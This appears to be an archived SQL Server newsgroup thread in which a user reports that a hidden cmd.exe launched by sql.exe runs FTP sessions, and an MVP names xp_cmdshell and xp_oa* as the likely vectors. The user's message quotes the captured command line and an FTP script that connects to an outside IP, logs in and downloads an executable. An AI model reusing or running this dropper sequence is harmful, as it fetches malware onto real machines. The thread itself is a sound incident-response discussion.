RE: malicious process...

From: Mike Epprecht (SQL MVP) (mike_at_epprecht.net)
Date: 04/28/05


Date: Thu, 28 Apr 2005 04:42:02 -0700

Hi

xp_cmdshell or xp_oa* are capable of doing this.

Regards
--------------------------------
Mike Epprecht, Microsoft SQL Server MVP
Zurich, Switzerland

MVP Program: http://www.microsoft.com/mvp

Blog: http://www.msmvps.com/epprecht/

"François G." wrote:

> Hi,
>
> Since I installed a firewall on my machine, it regularly
> detects unexpected ftp sessions.
>
> Thanks to a process explorer, I remarked that ftp is
> launched from a (hidden) cmd.exe, itself lauched by
> sql.exe (for your info, the ftp command line is : "ftp -n -
> s:???.txt" where ???.txt is a textfile in \system32\ ).
>
> What SQL subsystem is able to launch such a process? a
> stored procedure? a trigger? (fyi, SQLAgent is not
> running). How can I prevent this to occur?
>
> Thank you for your help,
>
> François
>
>
> Note - contents of the textfile :
>
> open 81.244.183.229 19470
> user itqavjflw itqavjflw
> get SCardClnt.exe
> quit
>
>



Relevant Pages

  • Re: Cluster Service remain on starting state after quorum log corr
    ... > You have to ask Microsoft Product Support for the Fix. ... > Mike Epprecht, Microsoft SQL Server MVP ... >>> Mike Epprecht, Microsoft SQL Server MVP ...
    (microsoft.public.sqlserver.clustering)
  • Re: Clustering with NAS
    ... Whilst I appreciate that clustering with NAS is ... >> Mike Epprecht, Microsoft SQL Server MVP ...
    (microsoft.public.sqlserver.clustering)
  • Re: SP4 performance Woes.
    ... besides avoiding SP4 like a virus. ... >> Mike Epprecht, Microsoft SQL Server MVP ...
    (microsoft.public.sqlserver.setup)
  • Re: Applying SP3A to a new node
    ... Yes, the installer is ... > Mike Epprecht, Microsoft SQL Server MVP ... >> cannot find the shared resources. ...
    (microsoft.public.sqlserver.clustering)
  • RE: Very Slow Response
    ... Mike Epprecht, Microsoft SQL Server MVP ... the hard disc light is on whenever waiting ... > the head movement is nothing like that heard on page swapping but there is ...
    (microsoft.public.sqlserver.setup)